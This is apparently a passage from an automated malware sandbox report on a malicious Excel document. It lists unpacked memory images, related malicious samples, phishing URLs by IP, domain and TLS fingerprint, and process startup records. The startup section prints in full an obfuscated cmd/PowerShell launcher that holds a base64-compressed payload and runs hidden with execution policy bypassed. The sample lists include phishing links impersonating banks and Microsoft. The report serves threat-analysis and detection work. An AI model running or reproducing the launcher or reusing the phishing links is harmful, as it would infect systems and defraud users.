14.2.csc.exe.370000.0.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.4400000.7.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4430000.5.unpack	Embedded_PE	unknown	unknown
5.2.csc.exe.360000.0.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4c0000.2.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.4370000.6.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.4430000.5.raw.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.19b0000.4.unpack	Embedded_PE	unknown	unknown
13.2.csc.exe.330000.0.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.470000.1.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1880000.3.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1080000.1.raw.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.4400000.7.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.d0000.0.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.3f60000.4.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.d0000.0.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.3fa0000.4.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.45c0000.6.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.260000.1.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.470000.1.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.3ea0000.3.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4480000.6.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.1ae0000.3.unpack	Embedded_PE	unknown	unknown
13.2.csc.exe.330000.0.raw.unpack	Embedded_PE	unknown	unknown
14.2.csc.exe.370000.0.raw.unpack	Embedded_PE	unknown	unknown
5.2.csc.exe.360000.0.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.1790000.2.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1bb0000.5.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.1ae0000.3.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.3ea0000.3.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.3f60000.4.raw.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.19b0000.4.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.3fa0000.4.raw.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1640000.2.raw.unpack	Embedded_PE	unknown	unknown
9.2.powershell.exe.4c0000.2.raw.unpack	Embedded_PE	unknown	unknown
12.2.powershell.exe.1790000.2.raw.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1640000.2.unpack	Embedded_PE	unknown	unknown
4.2.powershell.exe.1bb0000.5.unpack	Embedded_PE	unknown	unknown

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.36.193	Document.html	Get hash	malicious	Browse	i.imgur.com/gqcrgbr.gif
	Document.html	Get hash	malicious	Browse	i.imgur.com/WX5BtLn.png
	http://chaseonline.chase.com.public.enroll.identifyuser.aspx.lob.rbglogon.lob.rbglogon.lob.rbglogon.lob.rbglogon.footsie-spa.com/home/	Get hash	malicious	Browse	i.imgur.com/kwxPcY7.gif
	Scan0011.pdf	Get hash	malicious	Browse	i.imgur.com/dfA9LLf.png
216.239.34.21	C0JjhwmSgY.exe	Get hash	malicious	Browse	ipinfo.io/json
	fzGho2S7J8.exe	Get hash	malicious	Browse	ipinfo.io/ip
	Bundle_Specification_29433.doc	Get hash	malicious	Browse	ipinfo.io/ip
	gZuSEaW9Ob.doc	Get hash	malicious	Browse	ipinfo.io/ip
	gRubP5jd6j.exe	Get hash	malicious	Browse	ipinfo.io/ip
	2017-12-12-Trickbot-sample-dilaryi8.exe	Get hash	malicious	Browse	ipinfo.io/ip
	EvaJXMgKt6.apk	Get hash	malicious	Browse	ipinfo.io/json
	com.speed.fast.boost.cleaner.apk	Get hash	malicious	Browse	ipinfo.io/json
	TGtRE9tTVn.rtf	Get hash	malicious	Browse	humanite-partage.com/support/view/
216.239.32.21	http://rayanat.com/ico.ico	Get hash	malicious	Browse	ipinfo.io/ip
	FY18_Q4.xls	Get hash	malicious	Browse	ipecho.net/plain
	51REMITANCE RECEIPT -MT103 TRANSFER.exe	Get hash	malicious	Browse	www.kabarhape.com/iz2/?zBcT=pFBumQ7wMblIVRVRHdfLsVfLRWrkr6JfhnC0H5YeUgUNyDkP4mAowmBgAFuw1zrRBvAUpRaSk7SMooJtByzJVw==&z8=6lyLBhG0GfC40lyp
	mttvca.exe	Get hash	malicious	Browse	ipecho.net/plain
	Bofa_Charge01312019.xlsm	Get hash	malicious	Browse	myexternalip.com/raw
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	ipinfo.io/ip
	14308278291.xlsm	Get hash	malicious	Browse	ipecho.net/plain
	fax212-744-0926.doc	Get hash	malicious	Browse	ipinfo.io/ip
	25Payment cop.exe	Get hash	malicious	Browse	www.rowp.services/js3/?5jlHBbup=hmPO3xHVoAJGDy21LamNnNoA5rGNZSazK975dqBM5yRh7gYft29StjEOwzqiMMuWykfDjYkQNCfr65wW&0v1d=u4nPdxP8KzR4r
	cache.exe	Get hash	malicious	Browse	ipecho.net/plain
	Payment_Notification.pdf.exe	Get hash	malicious	Browse	www.purecurerawfood.com/fr/?0hp8V4m=XVrb4zniXcY/4fZXf4UGLA4skN/ok5pmC7PPdwzLT4F7dUqyWt3cLHENU/wXfkBSsNBeCBQAQxre996wBTa5tQ==&7ny=zBcPdxOpERI4
	Advanced_Uninstaller12.exe	Get hash	malicious	Browse	ipinfo.io/json
	Order_Data_096.doc	Get hash	malicious	Browse	ipinfo.io/ip
	fzGho2S7J8.exe	Get hash	malicious	Browse	ipecho.net/plain
	NQaupJNd7L.exe	Get hash	malicious	Browse	myexternalip.com/raw
	invoice.doc	Get hash	malicious	Browse	ipinfo.io/ip
	po.exe	Get hash	malicious	Browse	ipinfo.io/ip
	winupdate.exe	Get hash	malicious	Browse	myexternalip.com/raw
	http://valuesrevealed.com/trlhpdr.png	Get hash	malicious	Browse	ipinfo.io/ip
	2mRFN76jaF.doc	Get hash	malicious	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
prod.imgur.map.fastlylb.net	Document.html	Get hash	malicious	Browse	151.101.36.193
	Document.html	Get hash	malicious	Browse	151.101.36.193
	https://securev1.z13.web.core.windows.net/ions.html#	Get hash	malicious	Browse	151.101.36.193
	http://chaseonline.chase.com.public.enroll.identifyuser.aspx.lob.rbglogon.lob.rbglogon.lob.rbglogon.lob.rbglogon.footsie-spa.com/home/	Get hash	malicious	Browse	151.101.36.193
	https://02413rljujon5a5.z13.web.core.windows.net/ions.html#paul.knollmeyer@hpspartners.com	Get hash	malicious	Browse	151.101.36.193
	Scan0011.pdf	Get hash	malicious	Browse	151.101.36.193
	https://microsoft3.azurewebsites.net/utf8BbNCZ2lu.html#gbeaupre@devolutions.net	Get hash	malicious	Browse	151.101.36.193
	https://storage.googleapis.com/221719/w4d6w46.html	Get hash	malicious	Browse	151.101.36.193
	VIRUS_011380_000_031744_93545.XLS	Get hash	malicious	Browse	151.101.16.193
	1812201888498.XLS	Get hash	malicious	Browse	151.101.60.193
	https://www.hi-flex.com.ar/cgi_bin/fa91ab34806630264725a6f98134fe&cid=6&/m3fyu9e4q3kfvoc4rlkygzecrand13InboxLightaspxn1774256418&fid&1252899642&fid1&fav1/#?yehuda@priority.works	Get hash	malicious	Browse	151.101.60.193
	http://chiefexecutive.net	Get hash	malicious	Browse	151.101.36.193
	PO_88239.pdf	Get hash	malicious	Browse	151.101.36.193
	VIRUS_011380_000_031744_93545.XLS	Get hash	malicious	Browse	151.101.16.193
	20310_011_11353_0_88.xls	Get hash	malicious	Browse	151.101.16.193
	PO_88239.pdf	Get hash	malicious	Browse	151.101.36.193
	http://www.x.co/08HA76CH	Get hash	malicious	Browse	151.101.36.193
	20310_011_11353_0_88.xls	Get hash	malicious	Browse	151.101.16.193
	1812201888498.XLS	Get hash	malicious	Browse	151.101.60.193
	https://na01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.exceedstoragelimit.com%2Fqs.php%3Fe%3Dklovely%40transalta.com&data=02%7C01%7CKate_Lovely%40transalta.com%7C052e74c62f5644bd24bb08d6092363d0%7Caff3442b5f55409cbe77da97b366435a%7C0%7C0%7C636706444938920278&sdata=iesbNVACSyRDJY1v%2FBYB4GIAY3E3I1ExP8p499nW0Pc%3D&reserved=0	Get hash	malicious	Browse	151.101.36.193
ipinfo.io	PDF_100987464500.exe	Get hash	malicious	Browse	216.239.38.21
	rocketmining.com/toler.png	Get hash	malicious	Browse	216.239.38.21
	57ManlopService_NFe4354783538.exe	Get hash	malicious	Browse	216.239.38.21
	C0JjhwmSgY.exe	Get hash	malicious	Browse	216.239.38.21
	4tLZ2jYz8k.exe	Get hash	malicious	Browse	216.239.38.21
	http://rayanat.com/ico.ico	Get hash	malicious	Browse	216.239.32.21
	CompanyComplaint.doc	Get hash	malicious	Browse	216.239.38.21
	deloitte_tax_file28012019.xlsm	Get hash	malicious	Browse	216.239.32.21
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	216.239.32.21
	mswer.exe	Get hash	malicious	Browse	216.239.36.21
	fax212-744-0926.doc	Get hash	malicious	Browse	216.239.32.21
	YvGCoGzEzr	Get hash	malicious	Browse	216.239.36.21
	2QVYG668zD.exe	Get hash	malicious	Browse	216.239.38.21
	Scanned_from_a_Xerox_Multifunction_Printer.doc	Get hash	malicious	Browse	216.239.38.21
	5vVzWJZpCY.exe	Get hash	malicious	Browse	216.239.38.21
	FY18_Q4.xls	Get hash	malicious	Browse	216.239.36.21
	kraken_2_7.exe	Get hash	malicious	Browse	216.239.38.21
	Advanced_Uninstaller12.exe	Get hash	malicious	Browse	216.239.32.21
	calc.exe	Get hash	malicious	Browse	216.239.36.21

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Your_Purchase_4396143.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Bofa_Charge01312019.xlsm	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	14308278291.xlsm	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	vyplatyMGM.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Your_Purchase_4396143.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Confirmation029820.xlsm	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Payment_Doc_5136168.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Purchase_data_1037805.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	Your_Invoice_4886.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	1e0WqUnbON.exe	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	vyplatyMGM.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	99fec9fb-7148-4d49-a01f-963099c821c6.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	GgM4zgU80G.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	resume.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	WqioKGoT2T.docx	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	PotentialAPT.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	INV374016.doc	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21
	GgM4zgU80G.xls	Get hash	malicious	Browse	216.239.32.21 151.101.36.193 216.239.34.21

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

EXCEL.EXE (PID: 2460 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)

cmd.exe (PID: 2732 cmdline: CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( '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' ), [SySTEM.IO.comPREsSiOn.compreSSionMODE]::DEcoMpresS ) ^| FOReach{neW-oBjecT IO.STreamreadEr($_, [SySTem.TExt.enCODINg]::aScIi) }^|FOrEAch {$_.rEadToenD()} ) && poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 2472 cmdline: poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) ) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

csc.exe (PID: 884 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 912 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

